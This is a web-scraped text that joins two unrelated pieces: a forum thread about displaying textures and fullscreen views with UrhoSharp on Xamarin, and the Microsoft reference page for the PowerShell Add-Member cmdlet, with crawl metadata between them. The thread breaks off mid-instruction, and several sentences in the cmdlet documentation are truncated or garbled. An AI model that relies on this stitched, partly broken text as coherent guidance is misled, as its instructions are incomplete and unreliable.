This is not working on iOS gives the OpenGl error - "Error: Could not create OpenGL context, root cause 'failed to create OpenGL ES drawable".
@puneetmahali
Is my second example working for you?
BTW I never tried any Xamarin.IOS, I develop only for Windows and Android.
Actually I am working on Indoor Maps. I want to load the 2D Indoor Map images into 3D viewer with 360 degree movement. I am using Texture with Sphere shape. But It's not display into the full screen and light shade also come.
Can you please help me to solve this problem.
Here is my example-
@puneetmahali
Are you working on a Windows Forms/WPF application, while you have no fullscreen?
If yes, you have to initialize your app using ApplicationOptions class.
Regarding to the second problem "light shade also come" please run your current app, make a screenshot and post it here, because it is not clear for me, what is the problem.
@laheller
>>IMAGE am not familiar with Xamarin.iOS, never used.
I only develop on Xamarin.Android and WinForms platforms.
On Android if you want:
1. Fullscreen app in general, you have to specify a theme without ActionBar for your activity, for example @android:style/Theme.Holo.Light.NoActionBar or your custom style where you disable actionbar.
Then the whole device screen will be available for Activity layout(s) or other view.
2. For UrhoSharp you have to create the UrhoSurface within a fullscreen layout.
BTW I can't see your screenshots here.
Sorry @puneetmahali, I never tried any Xamarin.IOS, but it works on Android without problem.
One more thing, in the sample project, if you want to load image from URL it's better to use
var mb = new MemoryBuffer(wc.DownloadData(new Uri(url)));
because
var mb = new MemoryBuffer(wc.DownloadData(url));
didn't work for me.
@laheller
>>IMAGE still cannot see your screenshots.
Upload them somewhere and share the links here.
@laheller @ShahramShobeiri
We have some Urho shapes(Urho.Shapes) like Box, Sphere, Plane, Cone, Cylinder, Dome.....etc etc.
So I need to create a Static Component and loads the models into the above shape like below-
var plane = baseNode.CreateComponent();
plane.Model = CoreAssets.Models.Box;
That box provides the 3D view but now I want to load the image in a Square like a Simple ImageView through the texture. So, Which shapes will give me that shape also needs to think about Vector3 position who returns the view in the center.
Make it more Simple- I need to load an Image with texture in 2D view like a normal ImageView(square shape) in Xamarin.forms and It should work for both in iOS & Android.
@puneetmahali
Still not sure, what is your goal.
You want to display a Box shape and render different textures on its 6 surfaces?
@laheller
Are you able to download the Images?
No, I want to display the Image in a square shape and render different textures without 6 surfaces.
Please check your personal message also.
@puneetmahali
Then you have to:
Finally you have to transform (Rotate/Translate/Scale) your node to the final orientation/position/size.
|
https://forums.xamarin.com/discussion/comment/345197/
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Add-Member
Syntax
Add-Member -InputObject <PSObject> -TypeName <String> [-PassThru] [<CommonParameters>]
Add-Member [-MemberType] <PSMemberTypes> [-Name] <String> [[-Value] <Object>] [[-SecondValue] <Object>] > -InputObject <PSObject> [-TypeName <String>] [-Force] [-PassThru] [<CommonParameters>]
Description
The
Add-Member cmdlet lets you add members (properties and methods) to an instance of a PowerShell
object. For instance, you can add a NoteProperty member that contains a description of the object or
a ScriptMethod member that runs a script to change the object.
To use
Add-Member, pipe the object to
Add-Member, or use the InputObject parameter to
specify the object.
The MemberType parameter indicates the type of member that you want to add. The Name parameter assigns a name to the new member, and the Value parameter sets.
Beginning in Windows Windows PowerShell 3.0, the PassThru parameter, which generates an output
object, is needed less frequently.
Add-Member now adds the new members directly to the input
object of more types. For more information, see the PassThru parameter description.
Examples
Example 1: Add a note property to a PSObject
The following example adds a Status note property with a value of "Done" to the FileInfo
object that represents the
Test.txt file.
The first command uses the
Get-ChildItem cmdlet to get a FileInfo object representing".
$A = Get-ChildItem c:\ps-test\test.txt $A | Add-Member -NotePropertyName Status -NotePropertyValue Done $A.Status Done
Example 2: Add an alias property to a PSObject
The following example adds a Size alias property to the object that represents the
Test.txt
file. The new property is an alias for the Length property.
The first command uses the
Get-ChildItem cmdlet to get the
Test.txt FileInfo object.
The second command adds the Size alias property. The third command uses dot notation to get the value of the new Size property.
$A = Get-ChildItem C:\Temp\test.txt $A | Add-Member -MemberType AliasProperty -Name Size -Value Length $A.Size 2394
Example 3: Add a StringUse note property to a string
This example adds the StringUse note property to a string.
Because
Add-Member cannot add types to String input objects, you can speciy the PassThru
parameter to generate an output object. The last command in the example displays the new property.
This example uses the NotePropertyMembers parameter. The value of the NotePropertyMembers parameter is a hash table. The key is the note property name, StringUse, and the value is the note property value, Display.
$A = "A string" $A = $A | Add-Member -NotePropertyMembers @{StringUse="Display"} -PassThru $A.StringUse Display
Example 4: Add a script method to a FileInfo object
This example adds the SizeInMB script method to a FileInfo object which calculates the
file size to the nearest MegaByte. The second command creates a ScriptBlock that uses the
Round static method from the
[math] type to round the file size to the second decimal place.
The Value parameter also uses the
$This automatic variable, which represents the current
object. The
$This variable is valid only in script blocks that define new properties and methods.
The last command uses dot notation to call the new SizeInMB script method on the object in the
$A variable.
$A = Get-ChildItem C:\Temp\test.txt $S = {[math]::Round(($this.Length / 1MB), 2)} $A | Add-Member -MemberType ScriptMethod -Name "SizeInMB" -Value $S $A.SizeInMB() 0.43
Example 5: Copy all properties of an object to another
This function copies all of the properties of one object to another object.. The value is copied using the Value parameter. It uses the Force parameter
to add members with the same member name.
function Copy-Property ($From, $To) { $properties = Get-Member -InputObject $From -MemberType Property foreach ($p in $properties) { $To | Add-Member -MemberType NoteProperty -Name $p.Name -Value $From.$($p.Name) -Force } }
Example 6: Create a custom object
This example creates an Asset custom object.
The
New-Object cmdlet creates a PSObject. The example saves the PSObject in the
$Asset
variable.
The second command uses the
[ordered] type accelerator to create an ordered dictionary of names
and values. The command saves the result in the
$D variable.
The third command uses the NotePropertyMembers parameter of the
Add-Member cmdlet to add the
dictionary in the
$D variable to the PSObject.
The TypeName property assigns a new name, Asset, to the PSObject.
The last command pipes the new Asset object to the
Get-Member
cmdlet. The output shows that the object has a type name of Asset and the note properties that
we defined in the ordered dictionary.
$Asset = New-Object -TypeName PSObject $d = [ordered]@{Name="Server30";System="Server Core";PSVersion="4.0"} $Asset | Add-Member -NotePropertyMembers $d -TypeName Asset $Asset | Get-Member TypeName: Asset Name MemberType Definition ---- ---------- ---------- Equals Method bool Equals(System.Object obj) GetHashCode Method int GetHashCode() GetType Method type GetType() ToString Method string ToString() Name NoteProperty System.String Name=Server30 PSVersion NoteProperty System.String PSVersion=4.0 System NoteProperty System.String System=Server Core
Parameters
Indicates that this cmdlet adds a new member even the object has a custom member with the same name. You cannot use the Force parameter to replace a standard member of a type.
Specifies the object to which the new member is added. Enter a variable that contains the objects, or type a command or expression that gets the objects.
Specifies the type of the member to add. This parameter is required. The acceptable values for this parameter are:
- NoteProperty
- AliasProperty
- ScriptProperty
- CodeProperty
- ScriptMethod
- CopyMethod
For information about these values, see PSMemberTypes Enumeration in the MSDN library.
Not all objects have every type of member. If you specify a member type that the object does not have, PowerShell returns an error.
Specifies the name of the member that this cmdlet adds.
Specifies a hash table or ordered dictionary of note property names and values. Type a hash table or dictionary in which the keys are note property names and the values are note property values.
For more information about hash tables and ordered dictionaries in PowerShell, see about_Hash_Tables.
This parameter was introduced in Windows PowerShell 3.0.
Specifies the note property name.
Use this parameter with the NotePropertyValue parameter. This parameter is optional.
This parameter was introduced in Windows PowerShell 3.0.
Specifies the note property value.
Use this parameter with the NotePropertyName parameter. This parameter is optional.
This parameter was introduced in Windows PowerShell 3.0.
Returns an object representing the item with which you are working. By default, this cmdlet does not generate any output.
For most objects,
Add-Member adds the new members to the input object.
However, when the input object is a string,
Add-Member cannot add the member to the input object.
For these objects, use the PassThru parameter to create an output object.
In Windows PowerShell 2.0,
Add-Member added members only to the PSObject wrapper of objects,
not to the object.
Use the PassThru parameter to create an output object for any object that has a PSObject
wrapper.
Specifies optional additional information about AliasProperty, ScriptProperty, CodeProperty, or CodeMethod members.
If used when adding an AliasProperty, this parameter must be a data type. A conversion. The first ScriptBlock, specified in the Value parameter, is used to get the value of a variable. The second ScriptBlock, specified in the SecondValue parameter, is used to set the value of a variable.
Specifies a name for the type.
When the type is a class in the System namespace or a type that has a type accelerator, you can enter the short name of the type. Otherwise, the full type name is required. This parameter is effective only when the InputObject is a PSObject.
This parameter was introduced in Windows PowerShell 3.0.
Specifies the initial value of the added member. If you add an AliasProperty, CodeProperty, ScriptProperty or CodeMethod member, you can supply optional, additional information by using the SecondValue parameter.
Inputs
System.Management.Automation.PSObject
You can pipe any object type to this cmdlet.
Outputs
None or System.Object
When you use the PassThru parameter, this cmdlet returns the newly-extended object. Otherwise, this cmdlet does not generate any output.
Notes
You can add members only to PSObject objects. To determine whether an object is a PSObject
object, use the
-is operator.
For instance, to test an object stored in the
$obj variable, type
$obj -is [PSObject].
The names of the MemberType, Name, Value, and SecondValue parameters are optional. If you omit the parameter names, the unnamed parameter values must appear in this order: MemberType, Name, Value, and.
Related Links
Feedback
|
https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Utility/Add-Member?view=powershell-4.0
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Applies
force at
position. As a result this will apply a torque and force on the object.
For realistic effects
position should be approximately in the range of the surface of the rigidbody.
This is most commonly used for explosions. When applying explosions it is best to apply forces over several frames instead of just one.
Note that when
position is far away from the center of the rigidbody the applied torque will be unrealistically large.
Force can be applied only to an active rigidbody. If a GameObject is inactive, AddForceAtPosition has no effect.
Wakes up the Rigidbody by default. If the force size is zero then the Rigidbody will not be woken up.
See Also: AddForce, AddRelativeForce, AddTorque.
using UnityEngine; using System.Collections;
public class ExampleClass : MonoBehaviour { void ApplyForce(Rigidbody body) { Vector3 direction = body.transform.position - transform.position; body.AddForceAtPosition(direction.normalized, transform.position); } }
|
https://docs.unity3d.com/kr/2017.3/ScriptReference/Rigidbody.AddForceAtPosition.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
iofunc_ocb_calloc()
Allocate an iofunc Open Control Block
Synopsis:
#include <sys/iofunc.h> iofunc_ocb_t * iofunc_ocb_calloc( resmgr_context_t * ctp, iofunc_attr_t * attr );
Arguments:
- ctp
- A pointer to a resmgr_context_t structure that the resource-manager library uses to pass context information between functions.
- attr
- A pointer to a iofunc_attr_t structure that defines the characteristics of the device that the resource manager handles.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The iofunc_ocb_calloc() function allocates an iofunc OCB. It has a number of uses:
- It can be used as a helper function to encapsulate the allocation of the iofunc OCB, so that your routines don't have to know the details of the iofunc OCB structure.
- Because it's in the resource manager shared library, you can override this function with your own, allowing you to manage an OCB that has additional members, perhaps specific to your particular resource manager. If you do this, be sure to place the iofunc OCB structure as the first element of your extended OCB, and also override the iofunc_ocb_free() function to release memory.
- Another reason to override iofunc_ocb_calloc() might be to place limits on the number of OCBs that are in existence at any one time; the current function simply allocates OCBs until the free store is exhausted.
You should fill in the attribute's mount structure (i.e. the attr->mount pointer) instead of replacing this function.
If you specify iofunc_ocb_calloc() and iofunc_ocb_free() callouts in the attribute's mount structure, then you should use the callouts instead of calling the standard iofunc_ocb_calloc() and iofunc_ocb_free() functions.
Returns:
A pointer to an iofunc_ocb_t OCB structure.
Examples:
Override iofunc_ocb_calloc() and iofunc_ocb_free() to manage an extended OCB:
typedef struct { iofunc_ocb_t iofuncOCB; /* the OCB used by iofunc_* */ int myFlags; char moreOfMyStuff; } MyOCBT; MyOCBT *iofunc_ocb_calloc (resmgr_context_t *ctp, iofunc_attr_t *attr) { return ((MyOCBT *) calloc (1, sizeof (MyOCBT)); } void iofunc_ocb_free (MyOCBT *ocb) { free (ocb); }
|
http://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/i/iofunc_ocb_calloc.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
public class ConstantSpeculativeExecutionPolicy extends Object implements SpeculativeExecutionPolicy
SpeculativeExecutionPolicythat schedules a given number of speculative executions, separated by a fixed delay.
SpeculativeExecutionPolicy.SpeculativeExecutionPlan
clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait
public ConstantSpeculativeExecutionPolicy(long constantDelayMillis, int maxSpeculativeExecutions)
constantDelayMillis- the delay between each speculative execution. Must be strictly positive.
maxSpeculativeExecutions- the number of speculative executions. Must be strictly positive.
IllegalArgumentException- if one of the arguments does not respect the preconditions above.
public SpeculativeExecutionPolicy.SpeculativeExecutionPlan newPlan(String loggedKeyspace, Statement statement)
newPlanin interface
SpeculativeExecutionPolicy.
public void init(Cluster cluster)
initin interface
SpeculativeExecutionPolicy
cluster- the cluster that this policy is associated with.
public void close()
closein interface
SpeculativeExecutionPolicy
|
https://docs.datastax.com/en/drivers/java/2.1/com/datastax/driver/core/policies/ConstantSpeculativeExecutionPolicy.html
|
CC-MAIN-2019-26
|
en
|
refinedweb
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.